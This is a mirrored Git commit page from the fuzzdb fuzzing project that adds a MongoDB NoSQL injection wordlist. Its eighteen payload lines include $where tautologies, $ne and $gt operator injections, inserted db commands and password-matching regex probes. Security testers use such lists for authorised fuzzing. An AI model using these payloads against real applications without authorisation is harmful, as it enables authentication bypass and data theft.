mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-10 05:24:12 +00:00
added wordlist for no-sqli-injections for mongoDB
This commit is contained in:
parent
104aac598d
commit
0dfbeda6e7
1 changed files with 18 additions and 0 deletions
18
attack/no-sql-injection/mongodb.txt
Normal file
18
attack/no-sql-injection/mongodb.txt
Normal file
|
@ -0,0 +1,18 @@
|
|||
# Original source: https://github.com/cr0hn/nosqlinjection_wordlists
|
||||
true, $where: '1 == 1'
|
||||
, $where: '1 == 1'
|
||||
$where: '1 == 1'
|
||||
', $where: '1 == 1'
|
||||
1, $where: '1 == 1'
|
||||
{ $ne: 1 }
|
||||
', $or: [ {}, { 'a':'a
|
||||
' } ], $comment:'successful MongoDB injection'
|
||||
db.injection.insert({success:1});
|
||||
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|
||||
|| 1==1
|
||||
' && this.password.match(/.*/)//+%00
|
||||
' && this.passwordzz.match(/.*/)//+%00
|
||||
'%20%26%26%20this.password.match(/.*/)//+%00
|
||||
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
|
||||
{$gt: ''}
|
||||
[$ne]=1
|
Loading…
Reference in a new issue